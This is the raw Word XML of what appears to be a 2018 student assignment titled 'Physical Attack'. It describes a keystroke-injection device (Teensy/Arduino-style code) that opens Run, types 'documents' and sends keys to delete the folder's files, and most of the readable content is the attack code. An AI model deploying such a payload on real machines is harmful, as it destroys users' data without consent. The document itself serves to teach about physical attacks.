    <w:p w14:paraId="61D5FC3B" w14:textId="66FF1A15" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8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It will automatically type documents in search and enter documents folder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8FE0D" w14:textId="7BE6A01D" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8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Next, it will click on </w:t>
      </w:r>
      <w:r w:rsidR="00FB15DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>RIGHT button and deleted all files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9FBAC" w14:textId="77777777" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5C6E78" w14:textId="6F4FEB50" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr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2F252FB4" wp14:editId="66F3AFD2">
            <wp:extent cx="5731510" cy="3714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6195" w14:textId="4CE659D1" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C108D0E" w14:textId="62002721" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE9FD0C" w14:textId="3D9D89F4" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B831FC" w14:textId="77777777" w:rsidR="00ED77C5" w:rsidRDefault="00ED77C5" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F08FEF" w14:textId="77777777" w:rsidR="00FF76A8" w:rsidRDefault="00FF76A8" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264BF168" w14:textId="7E112620" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can check after the deleting all files from documents folders, it will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>shown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> on recycling bin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BF1B6" w14:textId="77777777" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7141CF3B" w14:textId="0624A6F7" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr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1B4C8465" wp14:editId="7F91CA83">
            <wp:extent cx="5731510" cy="35185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0F06" w14:textId="1FE5174F" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B487BA1" w14:textId="7AD10BEA" w:rsidR="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="008619A8">
      <w:pPr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 w:rsidRPr="00FB15DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Please check my code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C13F01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void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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setup(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079AE5FA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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Serial.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(9600); </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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delay(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C756EC7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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Keyboard.set_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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modifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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MODIFIERKEY_GUI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027A2A9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Keyboard.set_key1(KEY_R);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97E31F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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Keyboard.send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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now</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0D8CD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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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delay(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA27AF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</w:p>
    <w:p w14:paraId="06913E1E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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Keyboard.set_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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modifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08BAB3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Keyboard.set_key1(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF288A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Keyboard.send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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now</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF302DC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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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delay(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C18BC3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</w:p>
    <w:p w14:paraId="501B8983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proofErr w:type="spellStart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Keyboard.println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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("documents");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B773FFB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</w:p>
    <w:p w14:paraId="38DE4E69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Keyboard.set_key2(KEY_RIGHT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372DDE6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 Keyboard.set_key3(KEY_DELETE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B78C89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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Keyboard.send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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now</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24971E4A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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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delay(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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2000);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471D167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</w:p>
    <w:p w14:paraId="2D7B3210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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C5AE3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void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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loop(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877B6D2" w14:textId="77777777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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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delay(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58366EDE" w14:textId="13AD4F8A" w:rsidR="00FB15DB" w:rsidRPr="00FB15DB" w:rsidRDefault="00FB15DB" w:rsidP="00FB15D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r w:rsidRPr="00FB15DB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}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FB15DB" w:rsidRPr="00FB15D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82370" w14:textId="77777777" w:rsidR="00C224CB" w:rsidRDefault="00C224CB" w:rsidP="00301086">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="74EE5C8A" w14:textId="77777777" w:rsidR="00C224CB" w:rsidRDefault="00C224CB" w:rsidP="00301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116466684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14:paraId="400A5891" w14:textId="67128FA7" w:rsidR="00301086" w:rsidRDefault="0030108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44872F" wp14:editId="228C8D3E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030AAA" w14:textId="77777777" w:rsidR="00301086" w:rsidRDefault="00301086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44872F" id="Oval 7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" fillcolor="#40618b" stroked="f">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="4B030AAA" w14:textId="77777777" w:rsidR="00301086" w:rsidRDefault="00301086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3916A19A" w14:textId="77777777" w:rsidR="00301086" w:rsidRDefault="00301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47A5B" w14:textId="77777777" w:rsidR="00C224CB" w:rsidRDefault="00C224CB" w:rsidP="00301086">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62F3AB1F" w14:textId="77777777" w:rsidR="00C224CB" w:rsidRDefault="00C224CB" w:rsidP="00301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2D40C" w14:textId="67462E0A" w:rsidR="00301086" w:rsidRPr="00301086" w:rsidRDefault="00301086">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00301086">
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
      <w:t>Physical Attack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638E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3204CA8"/>
    <w:lvl w:ilvl="0" w:tplc="3154E8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76586"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F620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DB"/>
    <w:rsid w:val="000E0897"/>
    <w:rsid w:val="002F1ECA"/>
    <w:rsid w:val="00301086"/>
    <w:rsid w:val="00347967"/>
    <w:rsid w:val="00584287"/>
    <w:rsid w:val="005A25F9"/>
    <w:rsid w:val="005C15C6"/>
    <w:rsid w:val="005C68DB"/>
    <w:rsid w:val="00605508"/>
    <w:rsid w:val="00704E36"/>
    <w:rsid w:val="00760162"/>
    <w:rsid w:val="00846220"/>
    <w:rsid w:val="0085741A"/>
    <w:rsid w:val="008619A8"/>
    <w:rsid w:val="00A5413F"/>
    <w:rsid w:val="00B23945"/>
    <w:rsid w:val="00C224CB"/>
    <w:rsid w:val="00E706AC"/>
    <w:rsid w:val="00ED77C5"/>
    <w:rsid w:val="00FB15DB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ADAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{02B4DCDA-B014-46FB-83C6-2B833880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55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086"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00301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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-07T21:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-07T23:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>